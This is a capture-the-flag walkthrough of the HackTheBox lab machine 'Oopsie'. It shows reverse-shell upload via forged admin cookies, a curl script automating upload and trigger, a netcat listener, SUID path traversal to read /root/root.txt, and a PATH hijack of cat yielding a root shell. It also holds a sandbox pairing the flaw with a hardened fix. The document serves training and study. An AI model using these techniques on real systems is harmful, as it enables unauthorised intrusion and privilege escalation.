Oopsie — HacktheBox Writeup ( getting root flag without actually being root )

Mayank Garg
8 min read · Apr 24, 2021

Introduction:

Oopsie is an easy box on HacktheBox platform.

First, connect to the HacktheBox VPN and jump right in (the IP of the target box is 10.10.10.28).

Enumeration:

Let's enumerate, because enumeration is the key. I personally use Rustscan because it finds the open ports much faster than Nmap and then hands that port list to Nmap for the detailed scan. On distributions that package it, apt install rustscan is enough (use sudo if you are not the root user); otherwise download the .deb from the project's GitHub releases page and install that with apt.

Get a cheat-sheet or complete the Rustscan room on TryHackMe to learn how to use Rustscan to its full potential. The command I used was rustscan -a 10.10.10.28 --range 1-65535 -- -sC -sV -O -oN file.txt (the -O switch needs root, so run it with sudo).

  • -a specifies the target.
  • --range specifies the range of ports to scan. Here we are scanning all 65535 ports.
  • -- marks the end of Rustscan's own options; everything after it is passed through to Nmap.
  • -sC runs Nmap's default NSE scripts against the open ports. They enumerate the services (banners, HTTP titles, SSH host keys and so on); they are not a vulnerability scan, which would be --script vuln.
  • -sV reports the version of each running service.
  • -O is for OS detection.
  • -oN writes the output to a file in normal format (for future reference).

So, the results of Rustscan / Nmap show that ports 22 (SSH) and 80 (HTTP) are open. Open your web browser and enter the IP of the target box.

The second thing I do is directory bruteforcing. For this, nothing beats FFUF. I suggest watching this video by Codingo to understand how to use FFUF well: https://www.youtube.com/watch?v=iLFkxAmwXF0 . The command is ffuf -u http://10.10.10.28/FUZZ -recursion -w location/of/wordlist.txt | tee ffuf.log

  • -u specifies the target URL; the FUZZ keyword marks where each wordlist entry is inserted.
  • -recursion means that when ffuf finds a valid directory it queues that directory and fuzzes inside it as well, one level deeper each time (cap this with -recursion-depth on a large target).
  • -w defines the wordlist to use for fuzzing.
  • | pipes the output of the first command into the second; here ffuf's output is fed to tee.
  • tee prints the output on the terminal and also saves it to the specified file.

The interesting hit from FFUF is /cdn-cgi/login. Visit this endpoint by entering http://10.10.10.28/cdn-cgi/login. It greets us with a login page as shown:

Currently I did not have any username, so I tried bruteforcing the password with the usernames admin and administrator, but had no luck. I visited the homepage again and looked for something that could be useful, and visited different endpoints looking for anything useful, but again, no luck. So, I looked at a couple of writeups (yes, I looked at a writeup because I am also learning) and found that the author had used the password 'from the last machine'. I don't know which last machine they were talking about, but I used it. Use admin:MEGACORP_4dm1n!! as the login credentials.

Once logged in, the Uploads page is further restricted to the 'super-admin'. As the page name says, it lets us upload files, so if we can reach it we can try uploading a reverse shell to get a shell back. First, though, we have to find a way to become the super-admin.

Visit the Accounts page. Its URL contains an id parameter, which is worth fuzzing with Burp Suite. I use the Firefox extension FoxyProxy to switch the browser's proxy to Burp easily.

Intercept the request to the Accounts page, send it to Burp Intruder and fuzz the id parameter with the numbers 1 to 200 (1 to 50 is enough and faster).

The results show several users and their access IDs:

Edit the URL and set the id parameter to 30; the result is the super-admin account shown above.

Becoming super-admin on the application:

Now edit the cookies: replace the accessid value with 86575 and the name with super-admin. The application decides who you are from these client-controlled cookie values alone, so after the change we can open the Uploads page freely.

Gaining shell ( Initial Foothold ) :

Upload a PHP reverse shell, since the target runs PHP on the back end (the Wappalyzer browser extension tells you which technologies a web application uses). The pentestmonkey php-reverse-shell is a good choice. Edit the ip and port values: the ip must be your own VPN address (the tun0 interface), because that is where the target will connect back to, not the target's IP; for the port we use 443 here.

Upload it under any name you like, keeping the .php extension so the server executes it.

The reverse shell has been uploaded successfully. Now we start the netcat listener and trigger the uploaded shell.

Start the netcat listener on the same port you put in the uploaded shell, here 443, with nc -nlvp 443 (ports below 1024 need sudo).

To trigger the reverse shell, request the uploaded file's URL with curl; PHP executes the file and the listener catches the connection.

I stabilised the shell using Python's pty module. A stabilised shell gives you tab completion, Ctrl+C no longer kills the shell, and so on. You can also resize the remote terminal to match your own with stty rows 39 && stty cols 173; 39 and 173 are the dimensions of my terminal, and you can see yours by typing stty size locally.
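The foothold steps above (patch the pentestmonkey shell, upload it through the Uploads page with the forged cookie, start the listener, trigger it with curl), scripted in POSIX shell as an added example. This is not the writeup's own code. The page does not give the Uploads page URL, the form's file-field name, the cookie names, the directory uploads are served from, or your VPN address, so those are placeholders marked ASSUMED that you must fill in from what you see in Burp. The only part that runs offline is patch_shell.

```shell
#!/bin/sh
# Added example (not the writeup's own commands): the foothold steps above,
# driven with curl instead of the browser. Values marked ASSUMED are not on
# the page; take them from your own Burp/browser observations.

TARGET=http://10.10.10.28                                   # from the writeup
LHOST="${LHOST:-10.10.14.5}"                                # ASSUMED: your VPN (tun0) address
LPORT="${LPORT:-443}"                                       # the listener port used above
COOKIE="${COOKIE:-accessid=86575; name=super-admin}"        # values from the page; cookie NAMES are ASSUMED
UPLOAD_URL="${UPLOAD_URL:-$TARGET/cdn-cgi/login/UPLOAD_PAGE}"  # ASSUMED: the Uploads page URL
FIELD="${FIELD:-file}"                                      # ASSUMED: name of the form's file field
UPLOAD_DIR="${UPLOAD_DIR:-$TARGET/uploads}"                 # ASSUMED: where uploaded files are served from

# Rewrite the two "CHANGE THIS" lines of pentestmonkey's php-reverse-shell.php
# so the shell connects back to LHOST:LPORT; every other line is left untouched.
patch_shell() {   # patch_shell TEMPLATE LHOST LPORT  -> patched PHP on stdout
    sed -e 's|^[$]ip = .*|$ip = '"'$2'"';|' \
        -e 's|^[$]port = .*|$port = '"$3"';|' "$1"
}

# POST the file through the restricted Uploads page, presenting the forged
# super-admin cookie; prints the HTTP status so a 200 vs 302/403 is visible.
upload_shell() {  # upload_shell FILE
    curl -s -b "$COOKIE" -F "$FIELD=@$1" "$UPLOAD_URL" -o /dev/null -w '%{http_code}\n'
}

# Request the uploaded file so PHP executes it. Backgrounded, because the HTTP
# request does not complete while the reverse shell it spawned is still alive.
trigger_shell() { # trigger_shell NAME
    curl -s "$UPLOAD_DIR/$1" -o /dev/null &
}

if [ "${1:-}" = "--run" ]; then
    [ -f php-reverse-shell.php ] || { echo "put pentestmonkey's php-reverse-shell.php here first" >&2; exit 1; }
    patch_shell php-reverse-shell.php "$LHOST" "$LPORT" > rev.php
    echo "listener must already be running:  nc -nlvp $LPORT"
    echo "upload status: $(upload_shell rev.php)"
    trigger_shell rev.php
fi
```

Run it as sh foothold.sh --run with php-reverse-shell.php in the current directory and the listener already waiting. Once the shell lands, stabilise it as described above: python3 -c 'import pty; pty.spawn("/bin/bash")', then Ctrl+Z, stty raw -echo; fg, and finally export TERM=xterm plus the stty rows/cols line.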

Horizontal escalation ( becoming user `robert` ) :

There is a user called robert, so we should try to become that user and see what else we can do on this box. The login page lived at /cdn-cgi/login on the website, so look at the matching directory in the web root from the shell. The database configuration file db.php under /var/www/html/cdn-cgi/login/ contains a username and password for robert; the password is reused for his system account, so switch to him with the su command. Now we are the user robert.

Reading the root flag:

Currently we are the user robert.

Run the command id. We can see that robert is a member of the group bugtracker.

Now we have to find the files belonging to this group that robert can access. Type the command find / -type f -group bugtracker 2> /dev/null. Let's understand what this command does.

  • find is the tool that searches for files and directories.
  • / is where to start looking: the root of the filesystem, so the whole system is searched.
  • -type f restricts the search to regular files (-type d would look for directories).
  • -group means we want files owned by the specified group, here bugtracker.
  • 2> /dev/null sends any errors to /dev/null instead of the terminal. The errors are typically "Permission denied" for directories and files we are not allowed to access.

The output shows the bugtracker binary, and listing it with ls -l shows the SUID bit (an s in the owner's execute position) and that it is owned by root. If you don't know what SUID binaries are: they are executables with the set-user-ID permission bit, which makes them run with the effective user ID of the file's owner no matter who starts them. Because bugtracker is owned by root, running it gives us code executing with root privileges.

Run the binary; it asks for a 'bug id':

Enter any value to see its behaviour.

The values 1, 2 and 3 return the contents of files we don't know yet. Try entering a large number:

The error reveals that the binary prints the contents of files under the /root/reports directory, building the path from the id we supply.

PS: we cannot enter the root directory ourselves, but we can still read files under it because the binary runs with root privileges.

Now it's time to get the root flag without being the root user:

Since the path is built by appending our input to /root/reports/, we can traverse one level up with .., which lands us in /root, where the root flag lives. The binary prints whatever file the resulting path points at, so we just enter the flag's file name.

So the final payload is ../root.txt, which makes the binary read /root/reports/../root.txt, i.e. /root/root.txt. Enter the payload and you get your root flag.

Becoming root user:

But just reading the root flag isn't our goal; being the root user is.
So, let's escalate to root.

The bugtracker binary invokes cat by its bare name rather than an absolute path, so the shell it spawns looks cat up through the PATH variable, and PATH is something we control.
PATH is the list of directories searched, in order, for the commands we type in the terminal.

TIP:
Whenever a SUID binary runs basic commands like ps, ls or cat without an absolute path, we can prepend a directory we own to PATH and place our own executable with that command's name there. The binary then runs our program instead of the real command, with its elevated privileges.

What's happening here is that I changed what the cat command does: I made cat execute a shell, and since the binary runs with SUID root privileges, the shell we get is a root shell.
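A sandbox that reproduces both weaknesses of bugtracker exploited above (the unchecked id appended to /root/reports/, and cat resolved through PATH) next to a hardened version, written in POSIX shell as an added example. It is not the box's binary, which is a compiled program the page only describes; it assumes the binary behaves like system("cat /root/reports/<id>"), which is what both the traversal and the PATH hijack rely on, and it replaces /root with a temporary directory so you can run it as an ordinary user.

```shell
#!/bin/sh
# Added example (not the page's own code). Sandbox that reproduces the two
# mistakes the writeup exploits in bugtracker, assuming the binary behaves
# like system("cat /root/reports/<id>") as the page's observations suggest:
#   1. the id is pasted into the path unchecked, so ../root.txt escapes /root/reports;
#   2. "cat" is resolved through PATH, so a writable dir placed first in PATH wins.
# /root is replaced by a temporary directory, so nothing here needs SUID or root.

SANDBOX=$(mktemp -d)
REPORTS="$SANDBOX/reports"                       # stands in for /root/reports
mkdir -p "$REPORTS"
printf 'report one\n' > "$REPORTS/1"             # constructed sample reports
printf 'report two\n' > "$REPORTS/2"
printf 'FLAG{sandbox-root-flag}\n' > "$SANDBOX/root.txt"   # stands in for /root/root.txt

# Vulnerable behaviour: the id is concatenated into the path and cat is found via PATH.
vuln_bugtracker() {
    cat "$REPORTS/$1"
}

# Hardened behaviour: accept only a non-empty decimal id and call cat by absolute
# path. (A real fix would drop system() entirely and open the file directly, but
# this is enough to defeat both attacks shown below.)
safe_bugtracker() {
    case "$1" in
        ''|*[!0-9]*) echo "invalid bug id: $1" >&2; return 1 ;;
    esac
    /bin/cat -- "$REPORTS/$1"
}

# Drop a fake "cat" into DIR and put DIR first in PATH. BODY is the script body
# of the fake cat; on the box it would be 'exec /bin/sh -p' to get a root shell.
hijack_path() {   # hijack_path DIR BODY
    mkdir -p "$1"
    printf '#!/bin/sh\n%s\n' "$2" > "$1/cat"
    chmod +x "$1/cat"
    PATH="$1:$PATH"
    export PATH
    hash -r 2>/dev/null || true                  # forget cached lookups of cat
}

traversal_vuln() { vuln_bugtracker "../root.txt"; }   # reads the "root flag"
traversal_safe() { safe_bugtracker "../root.txt"; }   # rejected: not a number

if [ "${1:-}" = "--demo" ]; then
    echo "[vuln] id=1:              $(vuln_bugtracker 1)"
    echo "[vuln] id=../root.txt:    $(traversal_vuln)"
    traversal_safe || echo "[safe] traversal rejected"
    hijack_path "$SANDBOX/bin" 'echo "fake cat ran as uid $(id -u) with args: $*"'
    echo "[vuln] after PATH hijack: $(vuln_bugtracker 1)"
    echo "[safe] after PATH hijack: $(safe_bugtracker 1)"
    rm -rf "$SANDBOX"
fi
```

Run it with sh bugtracker_sandbox.sh --demo. On the box itself the body of the fake cat is exec /bin/sh -p (or /bin/bash -p): the -p flag matters because bash otherwise resets the effective uid to the real uid when the two differ, which would throw away the root privileges the SUID binary handed you.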

OOPSIE HAS BEEN PWNED!


Mayank Garg

Penetration Tester | Application Security | Bug Hunter | CEH v11 (Master)